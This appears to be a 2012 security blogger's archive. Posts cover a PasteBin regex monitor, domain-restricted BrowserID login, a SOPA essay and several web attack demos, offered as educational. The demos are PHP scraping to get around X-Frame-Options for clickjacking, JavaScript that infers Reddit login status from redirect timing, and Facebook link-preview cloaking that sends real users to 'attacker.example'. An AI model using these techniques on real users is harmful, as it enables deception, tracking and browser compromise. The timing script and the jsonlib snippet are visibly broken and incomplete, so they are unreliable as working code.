PasteBin has commonly been used by computer criminals to post and share information. This information can range from user accounts (Anonymous uses PasteBin frequently to dump lists of users and passwords) to credit card numbers and other personal information. The tool I've created allows a user to enter a regular expression as a search term. It then queries PasteBin every 5-10 seconds and looks at recently posted pastes for that term.
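A minimal sketch of such a poller follows (the archive URL and poll interval are assumptions, and a real script would fetch individual paste pages rather than scanning the index):

```python
import re
import time
import urllib.request

# Hypothetical values -- adjust for the real site or its scraping API.
ARCHIVE_URL = "https://pastebin.com/archive"
POLL_SECONDS = 7

def find_matches(text, pattern):
    """Return all non-overlapping matches of a user-supplied regex in a paste."""
    return re.findall(pattern, text)

def poll(pattern):
    # Fetch the recent-pastes page and scan it; errors are swallowed so a
    # transient network failure doesn't kill the loop (the try/except the
    # post mentions).
    while True:
        try:
            html = urllib.request.urlopen(ARCHIVE_URL, timeout=10) \
                                 .read().decode("utf-8", "replace")
            for hit in find_matches(html, pattern):
                print("match:", hit)
        except OSError:
            pass
        time.sleep(POLL_SECONDS)

if __name__ == "__main__":
    # e.g. a loose Visa-like pattern: 16 digits starting with 4
    poll(r"\b4\d{15}\b")
```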

For use cases, credit card companies could adapt the script to monitor PasteBin for posted card numbers and then immediately lock those accounts (each issuer has a distinctive number structure, so card numbers match predictable regexes).

This was just a very basic project that allowed me to familiarize myself with Python: fetching URLs, regular expressions, and try/except blocks.

Monday, July 23, 2012

Domain-Specific Sign-In with BrowserID

BrowserID (Persona) is Mozilla's login authentication system that treats email addresses as identities and usernames. By default, BrowserID works by simply verifying that a user actually owns the email address they are using to log in. There are no additional checks made before the user is enrolled as a "user" on the site. This functionality is great for websites that want to simplify logins and allow anyone to sign up. But suppose your website needs to limit signups to valid users of your organization (i.e., everyone with an email address at your organization's domain)?

Recently, while working on a project with Mozilla, I came across the need to restrict signups for a site I was working on. Although there have been some attempts to do this in the past (some Mozilla projects use BrowserID and still require additional verification), I could not find much documentation on restricting signups at the moment of login using email addresses. So I made my own, and here it is!


To start, this guide is written for Django projects, specifically those using Mozilla's Playdoh framework. If you aren't using Playdoh, I suggest trying it out - it really simplifies Django development and helps get projects started in seconds. Also, Playdoh comes pre-configured with BrowserID. If you decide not to use Playdoh, you can still follow this tutorial; you'll just need to set up BrowserID on your own first, and there are a number of guides for doing that.

Step 1 - Modify Project Settings

There are two settings files you need to edit (assuming Playdoh is being used; if not, look for the equivalent files in your project): settings/base.py and settings/local.py.

In settings/base.py

Add the following line in the "BrowserID" section (or at the bottom of the file):

BROWSERID_CREATE_USER = 'project.app.util.create_user'

Replace "project" with the name of your project and "app" with the name of your app.

Save the file.

In settings/local.py

Add the following lines:

ACCEPTED_USER_DOMAINS = [
    # 'example.com',
]

Replace the commented line with a comma-separated list of the domains from which you would like to allow users.


Save the file.

Step 2 - Create a util File

In your application's home directory (not the project directory), create a file called "util.py". Add these lines to that file:

from django.contrib.auth.models import User
from django.conf import settings
from project import app

def create_user(email):
    domain = email.rsplit('@', 1)[1]
    if domain in settings.ACCEPTED_USER_DOMAINS:
        return User.objects.create_user(email, email)

Replace "project" and "app" with your project's and app's names.


Now, when your users click the "Sign In with BrowserID" button, they must use an email address from an accepted domain before their account will be created. If they do not, they will be redirected to the homepage without being logged in.
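Stripped of the Django specifics, the gate is just a suffix check on the address. A standalone sketch (the domains are placeholders):

```python
ACCEPTED_USER_DOMAINS = ["example.com", "example.org"]  # hypothetical allow-list

def domain_allowed(email, accepted=ACCEPTED_USER_DOMAINS):
    """True if the address's domain (everything after the last '@') is allowed."""
    try:
        domain = email.rsplit("@", 1)[1]
    except IndexError:
        return False               # no '@' at all: reject malformed input
    return domain in accepted
```

Using rsplit on the last '@' matters: addresses may legally contain '@' inside a quoted local part, and splitting on the first one would let "attacker@evil.com"@example.com spoof the check.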


If you would prefer video instruction to follow along with, here you go:

Friday, July 13, 2012

Defeating X-Frame-Options with Scraping


Iframes are an element of web design that are loved and hated. Web developers (used to) love them because they easily allowed resources from various sites to be loaded on-demand within a webpage. Security professionals hate them because they allow content of one site (such as a login page) to be loaded within another site that may not be trusted. This introduces a security concern known as click-jacking where a malicious site overlays invisible elements over what the user believes is a safe login form.

The Solution

Since these concerns arose, the X-Frame-Options header was developed to prevent the loading of one site within an iframe of another. This header is supported by all major browsers and includes two options:
  • SAMEORIGIN - the site can only be loaded within pages of the same domain
  • DENY - the page cannot be loaded in a frame at all

Page Scraping

The goal of X-Frame-Options, as described above, was to prevent the loading of one site within another, potentially malicious site. However, there are multiple ways a site's contents can be displayed, and an iframe is only one. Page scraping can be done via a server-side script written in PHP, Python, or another language. The code below is an example of how a page's code can be loaded using PHP:


<?php
$userAgent = 'Googlebot/2.1 (+http://www.google.com/bot.html)';
$url = "http://www.yahoo.com";
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, $userAgent);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FAILONERROR, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_AUTOREFERER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$html = curl_exec($ch);
curl_close($ch);

echo $html;
?>


This small bit of code, when loaded on any website, at any URL, will cause the contents of Yahoo's home page to be displayed. A malicious user could overlay hidden elements over the $html echoed out and easily execute the same attack X-Frame-Options prevents.


Luckily, some large websites like Google and Facebook are aware of issues like these and use a complex combination of user-agent and IP address checks to prevent server-based scripts from loading their content. Replace the Yahoo URL with Google's in the code above and you'll notice that nothing loads.

You Don't Even Need a Server!

This problem is not typically able to be replicated on a simple HTML page without server-side code, because JavaScript's cross-domain policies prevent it from retrieving content from a different domain (in other words, you can't scrape the HTML using just JavaScript). However, through some clever trickery, the jsonlib library has enabled JavaScript "scraping." What is actually happening is that the JavaScript makes a call to a server hosted on the public Internet which serves as a middle-man. So the same process (server-side scraping) is happening; it is just being invoked locally from JavaScript.

For this to work, save the jsonlib.js file locally. Then, create a simple HTML page with the following code:

<script type="text/javascript" src="jsonlib.js"></script>
<script type="text/javascript">
    function fetchPage(url) {
        jsonlib.fetch(url, function(m) { document.getElementById('test').innerHTML=m.content; });

<body onload="fetchPage('')">
<div id="test">

Most likely, many large websites block sites that enable this middle-man functionality. However, it is easy for anyone with access to a server to recreate the process. X-Frame-Options is very useful, but it cannot stop an attacker who skips iframes entirely and simply copies the site's code and serves it locally. To protect yourself against these kinds of attacks, always make sure that you do not enter sensitive data on domains you do not trust. Always check the URL bar before typing!

Monday, June 25, 2012

My First Month at Mozilla

I've been working as an intern for almost a month now (3 1/2 weeks is close enough) and finally decided to get around to writing a blog post about my experiences so far. To start, Mozilla is an amazing place to work; "we're about the open web" is not just a tag-line, it's a core principle of the entire organization.

My first week was pretty hectic. There's a phrase at Mozilla called the "Mozilla Firehose" that refers to the massive amounts of information you will take in during your first week(s) at the company. It's entirely true, although not unmanageable because there are great people to help at each step. Once I got beyond the account-setup, email-checking, bug-filing, question-asking first few days, I was able to get a good head start on what I'll be working on for the next six months.

My position at Mozilla is on the Security Assurance team as a web application security intern. Essentially, my team and I are responsible for maintaining the security of all of Mozilla's web properties, investigating security bugs, and performing security reviews of new products. It has been a very interesting position because I am exposed to new security issues each day and rarely do the same thing twice (which is great because I get bored easily). So far I have investigated XSS bugs reported by the community in a number of Mozilla's web pages, analyzed more advanced attacks such as remote code execution, observed Mozilla's web bounty program in action (they pay members of the community for responsible disclosure of bugs), and performed a security review of an internal project known as Datazilla. I hope to continue investigating security issues as well as take on a number of additional projects.

The environment at Mozilla has been awesome. There is food around every corner (literally), and the workplace is casual and very centered around teamwork. Although a number of the employees on my team work remotely, it is not difficult to use IRC or email to communicate. I have also had the opportunity to travel to Mozilla's San Francisco office, which has one of the best views of any office I've ever been in: it overlooks the bay directly next to the Bay Bridge.

Although I'm only a few weeks into my internship at Mozilla, I've already been exposed to a number of great learning opportunities. I've also seen how Mozilla operates as an organization and the true commitment of the organization's members to an open web, not bound by proprietary technologies. I am looking forward to a great Summer and Fall before returning to RIT in the Winter.

Tuesday, January 31, 2012

Intercepting Requests in Web Games

[Disclaimer: I am writing this post as an educational look into intercepting and editing GET and POST requests. How you use it is up to you. That said, this is less a "security" issue and more a case of poor design.]

Most people have probably played some form of online game, especially a "social" game within Facebook. I first got to thinking about these games when a member of the security group I'm in (SPARSA) gave a presentation on editing Android APKs. One demo he gave involved editing the list of approved words in Words with Friends, a Scrabble-like game on Facebook. That demo was done by decompiling the Android APK, editing the source files, and recompiling it. However, since the game had an online counter-part, I wanted to see how Facebook games were sending and receiving their data.

As I mentioned, this application involves playing what is essentially Scrabble with your Facebook friends. To play, a player must use an actual word. On the mobile version, the word is checked against a list of approved words stored within the APK. On the desktop version, the word is sent off to Zynga's servers to be validated, and a response, either valid or invalid, is returned.

As it turns out, intercepting this "word check" is surprisingly simple. In the presentation below, I walk through the steps of intercepting and modifying the GET requests to allow any word to be validated properly, essentially permitting the playing of any word.



Tuesday, January 17, 2012

What's At Stake

In just three hours, the sixth most-visited website on the Internet will transform from a vibrant, virtually unending stockpile of knowledge into a single, blacked-out page. I am 19 years old; since the day my eyelids first fluttered open, technology, computers, and the Internet have been a fact of life, growing at a speed that is incomprehensible to the very people that created it. Over 30 hours of video are uploaded to YouTube every single minute; historic events are now measured in Tweets per Second; Facebook processes more pictures in a single day than there are people on this planet; and the amount of information created, shared, and stored in this year alone is greater than the amount of information created since the dawn of time. I've watched as cities of information have blossomed overnight, built on the social structures of human interaction and desire for attention. I have seen technology connect people, improve lives, save lives, create and destroy relationships, even start and win a revolution. And yet I never imagined that my government, the same government that denounces censorship around the world and that fights for undeniable human rights, would bow to the pressure of the collective corporate world and attempt to pass a law that destroys the very vibrancy and freedom on which the world's network is built.

But here we are. We're at a period in technology history where we are effectively handing control of a network so complex it requires an army of experts to maintain, to elected officials who could be our parents. We are watching as they fumble about, unable to understand the technological marvel and complexity that allows this network to run. Most of these people could not define the word "domain," much less understand how such a trivial-sounding word comprises the structural integrity of the Internet. They are failing us because corporate studios in Hollywood are spending millions of dollars to convince them that a piece of legislation will solve the problem of piracy. Instead of focusing on the underlying causes, these corporations have managed to persuade many Senators and Congressmen to vote on a bill that will cause unimaginable damage to the integrity of the Internet as we know it.

A few years ago, I learned about the immense censorship that occurs in China. I saw two images, side by side representing Google Image results for the term "Tiananmen Square." On the left were the results as seen by Americans: bloody, gory images of a massacre. On the right were the results as seen by the Chinese: a few buildings, a monument, and a sunny sky. The fact that a government could actively suppress information from its citizens, especially information involving historic events, astounded me. I've continued to hear about the Great Firewall of China, a country-wide filter applied to the Internet access of citizens to prevent access to controversial information. And every time I read about this I was thankful that I live in the United States, a place where freedoms of speech and press are building blocks of this country. But today I am not so sure. It's hard to imagine living in a place like China; yet I fear if we wait long enough, without acting, we may someday learn.

SOPA would not censor political sites or hide information from the American public; it's a bill aimed at stopping piracy. Piracy is certainly a major problem that needs to be addressed. However, SOPA would put into place a simple and effective mechanism for shutting down websites without appropriate process. For demonstrable evidence of this, just look at WikiLeaks. With a simple phone call, our government turned payment processors and businesses against it without anything resembling a trial. If SOPA or PIPA passes, those in positions of authority will learn just how easy it is to destroy a website and eventually do just that. I am fearful that SOPA will evolve; it will turn from shutting down a few foreign websites for piracy into a massive effort to purge the Internet of compromising information or material "dangerous to national security." It wouldn't be difficult to convince a judge that a site should be banned, and with a flip of a switch, without due process, it would be.

Previous generations did not grow up with technology; they did not rely on it or start revolutions with it. But the innovations and amazing changes it has made are ours and our children's. I am not content with handing control of this massive, powerful part of our lives to individuals whose vote can be purchased. We as a nation of students and teachers, employees and employers, and businesses and users need to take back control of what we have created. We need to prove to our elected officials that they are voting with our interests in mind, not those of corporate media.

I am going to watch Wikipedia at midnight. I hope that those we have elected are watching also and that the strike made by a few websites is enough to voice our concerns loud enough for them to hear. I just hope they listen.

Monday, January 16, 2012

Guessing User Logged-In Status With Redirects and Load Times

I've been working on a project that uses non-traditional methods to detect a user's signed-in status on websites. When you visit a page like a site's "submit" page, that page first checks whether you are logged in. If you are, the standard "Submit" page is displayed. If you are not, the browser is redirected to the login page. My idea rests on the fact that this redirect takes time; not a significant amount of time, but at least a millisecond or two. If we could somehow record the loading times of these pages, we could, with a fair amount of accuracy, determine whether or not a user is logged in to a particular website.

To do this, I have set up an IFRAME within a website (I'll have to check and see if this works by loading a page as if it were a script, but that's later on the agenda). I then use JavaScript to time the page load, and then load the page that the first page would have redirected to. Let's look at an example.

When you go to Reddit's submit page and you are logged in, the /submit page is shown. When you are not logged in, you are redirected to the standard Reddit login page. My script first loads the submit page, saving its load time to a variable. Then the timer is reset and the standard login page is loaded. The end result boils down to these facts:

If you ARE logged in, the submit page will load quicker than the login page because no redirect is needed when the submit page is loaded.

If you ARE NOT logged in, the login page will load quicker because the submit page requires a redirect and the login page does not.

There are a few problems that prevent this script from being 100% reliable. First, despite an initial page load that doesn't count towards the load timer, browser caching is not fully predictable; one page may be cached more aggressively than another. Second, although the two page loads are performed within 1.2 seconds of each other, network and remote-server conditions could change within that time, causing one page to load faster. This is more of a proof-of-concept than a reliable script, but it does show that a remote page could attempt to guess all of the services you use by loading remote pages in hidden IFRAMEs.

See if it works for you:


        <script type="text/javascript">

            var startTime=new Date();
            var a;
            var b;
            var done = 0;

            function currentTime(){
                if(done == 0)
                    done = 1;
                    var ms = 1200;
                    ms += new Date().getTime();
                    while (new Date() < ms){}
                    startTime=new Date();
                else if(done == 1)
                    a=Math.floor((new Date()-startTime)/100)/10;
                    if (a%1==0) a+=".0";
                    done = 2;
                    var ms = 1200;
                    ms += new Date().getTime();
                    while (new Date() < ms){}
                    startTime=new Date();
                    b=Math.floor((new Date()-startTime)/100)/10;
                    if (b%1==0) b+=".0";
                    if(a > (b + .1))
                        document.write('You are not logged into Reddit.');
                        document.write('You are logged into Reddit.');


        <iframe id="framer" src="" onLoad="currentTime()" style="display:none;"></iframe>


Sunday, January 15, 2012

Spreading Malicious Links by Redirecting Facebook's Previewer

When you post a link on Facebook, Facebook has a link fetcher / preview function that visits the website and grabs information about it, along with a thumbnail if available. If you post a link that redirects, Facebook's fetcher is still able to follow the redirect and grab the end-result information.

Let's start with an example. We have this lovely image of a dog and cat on Imgur (found on /r/aww), and a shortened link that redirects to it.

Facebook displays the link like so:

Note that once the link converts to a preview, the original text can be replaced.

Notice that the end link (imgur) is displayed and not the original shortened link. But suppose we skip the URL shortener and make our own redirect service. To demo this, I've created a site on a spare domain I have. This site is just a redirection service that logs visitor IPs. But if I had more malicious intentions, I could put a browser exploit on the page that sits between Facebook and the redirect's destination. Then, Facebook's preview utility would still successfully fetch the end link, but the user clicking it could be exploited. Let's take a look.

My site generates a URL to post.

Now, like in the previous example, I can edit the link and title and unsuspecting users will think it is a cute dog. However, they're actually being redirected through my malicious site (note: it's not actually malicious. It simply logs IP addresses to prove a point, but an attacker could compromise the browser).

I post and wait...

As you can see in this image, I have a click! The redirection was entirely seamless to the user, just like using a normal URL shortener. But without them ever knowing, I have logged their IP, hostname, and user-agent string. This isn't terrible on its own, but I could have used a browser exploit to compromise their system instead of just redirecting.

But then wouldn't I be attacking Facebook's previewer too, since it visited the site? Well, technically yes, unless I wrote a quick PHP script that simply redirects Facebook's IPs but attacks everyone else.
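That sort of cloaking is only a few lines of code. Here is a Python sketch of the decision (the crawler network below is a documentation range and the destinations are made up; a real cloaker would use the previewer's observed source networks):

```python
import ipaddress

# Hypothetical crawler range, NOT Facebook's real addresses.
CRAWLER_NET = ipaddress.ip_network("203.0.113.0/24")

REAL_DESTINATION = "http://i.imgur.com/cute-dog.jpg"           # what the previewer sees
TRAP_DESTINATION = "http://attacker.example/log-then-redirect"  # what real users get

def destination_for(ip):
    """Crawlers get the innocent target; everyone else goes through the trap."""
    if ipaddress.ip_address(ip) in CRAWLER_NET:
        return REAL_DESTINATION
    return TRAP_DESTINATION
```

This is exactly why the preview can never be trusted: the server is free to answer the previewer and the user differently.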

This is just a demo of something I realized. Please don't use it maliciously, but also be aware that any link you click on Facebook could actually go somewhere else that is not what the preview indicates. To help mitigate this problem, Facebook could include an additional warning on links that redirect.